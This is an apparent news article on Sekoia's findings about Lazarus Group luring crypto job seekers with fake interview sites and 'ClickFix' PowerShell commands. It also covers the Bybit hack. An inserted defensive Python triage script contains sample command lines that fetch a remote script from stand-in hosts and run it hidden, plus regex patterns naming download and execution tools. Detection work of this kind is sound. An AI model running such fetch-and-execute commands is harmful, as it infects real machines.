A recent cybersecurity report by Sekoia has revealed a sophisticated threat posed by the Lazarus Group, the notorious hacking group associated with North Korea. It is now leveraging a tactic known as "ClickFix" to target job seekers in the cryptocurrency sector, especially in centralized finance (CeFi).
This approach is an adaptation of the group's earlier "Contagious Interview" campaign, which was aimed at developers and engineers in artificial intelligence and crypto-related roles.
Lazarus Exploits the Crypto Job Market
In the recently observed campaign, Lazarus has shifted its focus to non-technical professionals, such as marketing and business development staff, by impersonating major crypto companies such as Coinbase, KuCoin, Kraken, and even stablecoin issuer Tether.
The attackers build fraudulent websites that mimic job application portals and lure candidates with fake interview invitations. These sites often include realistic application forms and even video introductions, which reinforces the sense of legitimacy.
However, when the user tries to record a video, a fabricated error message is displayed, usually indicating a webcam or driver malfunction. The page then asks the user to run PowerShell commands under the guise of troubleshooting, which leads to malware being downloaded.
The ClickFix method, although relatively new, has become more prevalent because of its psychological simplicity: users believe they are fixing a technical problem, not executing malicious instructions. According to Sekoia, the campaign relies on 184 fake interviews that reference at least 14 prominent companies to enhance credibility.
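A defender can triage for the behaviour described above by looking for a script interpreter that the user's own desktop shell started and that immediately fetches remote content. The following is an added example, not code from Sekoia or from the original article; the event fields, host names, URLs and the scoring heuristic (including the assumption that the pasted command is launched from explorer.exe) are constructed for illustration.

```python
import re

# Constructed process-creation events (fields loosely follow Sysmon Event ID 1).
# Hosts, URLs and command lines are made up; none come from the Sekoia report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"host": "mkt-pc-11", "parent": EXPLORER, "image": PS,
     "cmdline": 'powershell -w hidden -c "iwr https://camera-fix.example.invalid/u.ps1 | iex"'},
    {"host": "dev-ws-02", "parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": PS,
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"host": "bd-pc-04", "parent": EXPLORER, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c curl -o %TEMP%\drv.zip https://driver-update.example.invalid/d.zip"},
    {"host": "it-admin-01", "parent": EXPLORER, "image": PS,
     "cmdline": "powershell Get-Service"},
]

# Assumed heuristic (not Sekoia's detection logic): three independent signals.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
FETCH = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
HIDE_OR_EXEC = re.compile(r"\biex\b|invoke-expression|-w(?:indowstyle)?\s+hid|-enc", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if basename(ev["image"]) not in INTERPRETERS:
        return 0, reasons
    if basename(ev["parent"]) == "explorer.exe":
        reasons.append("interpreter started from the user's desktop shell")
    if FETCH.search(ev["cmdline"]):
        reasons.append("command line fetches remote content")
    if HIDE_OR_EXEC.search(ev["cmdline"]):
        reasons.append("hidden window or in-memory execution")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (host, score, reasons) for events with at least `threshold` signals."""
    scored = ((ev["host"], *score_event(ev)) for ev in events)
    return [hit for hit in scored if hit[1] >= threshold]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: score {score}: " + "; ".join(reasons))
```

Requiring two signals keeps routine administrative use, such as the `Get-Service` event, out of the results while still surfacing a plain `curl` download started from the desktop shell.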
These latest tactics reflect the group's growing sophistication in social engineering and its ability to exploit the professional ambitions of individuals in the competitive crypto market. Interestingly, this shift also indicates that the group is broadening its targeting criteria to include not only those who have access to code or infrastructure but also those who may handle sensitive internal data or are in a position to facilitate breaches inadvertently.
Despite the emergence of ClickFix, Sekoia noted that the original Contagious Interview campaign is still active. This parallel deployment of strategies suggests that the North Korean state-sponsored group may be testing their relative effectiveness or tailoring tactics to different target demographics. Either way, the campaigns share a consistent goal: to deliver information-stealing malware through trusted channels and manipulate victims into infecting themselves.
Lazarus Behind the Bybit Hack
The FBI officially attributed the $1.5 billion attack on Bybit to the Lazarus Group. The hackers targeting the crypto exchange used fake job offers to trick employees into installing tainted trading software known as "TraderTraitor".
Although made to look authentic through cross-platform JavaScript development, the applications carry built-in functionality for stealing private keys and executing illicit transactions on the blockchain.